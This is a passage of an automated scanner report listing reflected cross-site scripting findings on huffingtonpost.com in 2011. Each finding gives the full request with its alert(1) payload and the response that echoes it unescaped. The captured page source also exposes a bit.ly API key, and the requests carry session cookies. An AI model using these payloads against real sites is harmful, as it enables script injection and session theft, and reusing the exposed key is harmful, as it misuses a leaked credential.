Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=29
Date: Thu, 05 May 2011 00:58:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
= 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/?icid=navbar_huffpo_main58739e"-alert(1)-"26ca8215966";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display_d
...[SNIP]...

2.18. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a79a"-alert(1)-"0ae47100ee4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?icid=navbar_huffpo_main5&7a79a"-alert(1)-"0ae47100ee4=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=30
Date: Thu, 05 May 2011 00:58:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
= 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/?icid=navbar_huffpo_main5&7a79a"-alert(1)-"0ae47100ee4=1";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display
...[SNIP]...

2.19. http://www.huffingtonpost.com/2011/05/02/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/05/02/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76498"-alert(1)-"978acabc995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/05/02/?76498"-alert(1)-"978acabc995=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 123154
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=277
Date: Thu, 05 May 2011 10:58:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
le_fb_widgets = 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/02/?76498"-alert(1)-"978acabc995=1";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display
...[SNIP]...

2.20. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/05/02/holocaust-memorial-day_n_856638.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57a5e"-alert(1)-"d6ccc38ed4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/05/02/holocaust-memorial-day_n_856638.html?57a5e"-alert(1)-"d6ccc38ed4b=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.14.9.1304575182212; s_pers=%20s_getnr%3D1304575182214-New%7C1367647182214%3B%20s_nrgvo%3DNew%7C1367647182216%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Osama%25252520Bin%25252520Laden%25252520Pictures%25252520Will%25252520Not%25252520Be%25252520Released%2525252C%25252520Obama%25252520Decides%25252520%25252528UPDATED%25252529%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Thu, 05 May 2011 01:00:54 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 01:00:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 470003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
ent_vertical_name = 'world';
   HPConfig.current_vertical_id = 15;
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/02/holocaust-memorial-day_n_856638.html?57a5e"-alert(1)-"d6ccc38ed4b=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

2.21. http://www.huffingtonpost.com/2011/05/04/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/05/04/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73665"-alert(1)-"b74fba3530f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/05/04/?73665"-alert(1)-"b74fba3530f=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 140702
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=287
Date: Thu, 05 May 2011 10:58:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
le_fb_widgets = 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/04/?73665"-alert(1)-"b74fba3530f=1";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display
...[SNIP]...

2.22. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/05/04/cnn-poll-finds-that-most-_n_857597.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 225fd"-alert(1)-"d892f95823f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/05/04/cnn-poll-finds-that-most-_n_857597.html?225fd"-alert(1)-"d892f95823f=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 256534
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:58:56 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
t_vertical_name = 'media';
   HPConfig.current_vertical_id = 4;
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?225fd"-alert(1)-"d892f95823f=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

2.23. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/05/04/osama-bin-laden-pictures_n_857568.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0d5c"-alert(1)-"6cd81aa9f7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/05/04/osama-bin-laden-pictures_n_857568.html?c0d5c"-alert(1)-"6cd81aa9f7d=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.6.10.1304575105; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; s_pers=%20s_getnr%3D1304575170358-New%7C1367647170358%3B%20s_nrgvo%3DNew%7C1367647170363%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Breaking%25252520News%25252520and%25252520Opinion%25252520on%25252520The%25252520Huffington%25252520Post%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Thu, 05 May 2011 01:00:32 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 01:00:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 279986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
t_vertical_name = 'world';
   HPConfig.current_vertical_id = 15;
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/04/osama-bin-laden-pictures_n_857568.html?c0d5c"-alert(1)-"6cd81aa9f7d=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

2.24. http://www.huffingtonpost.com/ads/check_flights.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/ads/check_flights.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e44cb<img%20src%3da%20onerror%3dalert(1)>247063d742 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e44cb<img src=a onerror=alert(1)>247063d742 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ads/check_flights.php?hash_arr=668c86f90cebbc608352294daf80abf4,6c43dadc0399d240a9123eabb15dcbde,a54ec74e448643da029271f5eae046b4&spot=right_rail_/e44cb<img%20src%3da%20onerror%3dalert(1)>247063d742flex HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; huffpost_adssale=y; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_getnr%3D1304575104613-New%7C1367647104613%3B%20s_nrgvo%3DNew%7C1367647104615%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 00:59:42 GMT
Connection: close
Content-Length: 86

{"result":false,"spot":"right_rail_\/e44cb<img src=a onerror=alert(1)>247063d742flex"}

2.25. http://www.huffingtonpost.com/ads/check_flights.php [spot parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/ads/check_flights.php

Issue detail

The value of the spot request parameter is copied into the HTML document as plain text between tags. The payload 4f9ed<img%20src%3da%20onerror%3dalert(1)>7efda56f1f4 was submitted in the spot parameter. This input was echoed as 4f9ed<img src=a onerror=alert(1)>7efda56f1f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ads/check_flights.php?hash_arr=668c86f90cebbc608352294daf80abf4,6c43dadc0399d240a9123eabb15dcbde,a54ec74e448643da029271f5eae046b4&spot=right_rail_flex4f9ed<img%20src%3da%20onerror%3dalert(1)>7efda56f1f4 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; huffpost_adssale=y; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_getnr%3D1304575104613-New%7C1367647104613%3B%20s_nrgvo%3DNew%7C1367647104615%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 00:59:40 GMT
Connection: close
Content-Length: 85

{"result":false,"spot":"right_rail_flex4f9ed<img src=a onerror=alert(1)>7efda56f1f4"}

2.26. http://www.huffingtonpost.com/advertise/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/advertise/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3503"-alert(1)-"679e429de31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /advertise/?c3503"-alert(1)-"679e429de31=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 96474
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=159
Date: Thu, 05 May 2011 10:58:37 GMT
Connection: close

<script>
ad_ears_on = true;

</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
ble_fb_widgets = 1;
   HPConfig.current_vertical_name = 'homepage';
   HPConfig.current_vertical_id = -1;
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/advertise/?c3503"-alert(1)-"679e429de31=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

2.27. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/badge/badges_json_v2.php

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 27f4c<script>alert(1)</script>ea4f1e5950b was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous&gn=window.Badges_217429195_1&eu=http%3A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html&id=857568&eco=1304530500&ebi2&entry_design=&cb=window.Badges_217429195_1.slicesCallback27f4c<script>alert(1)</script>ea4f1e5950b&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
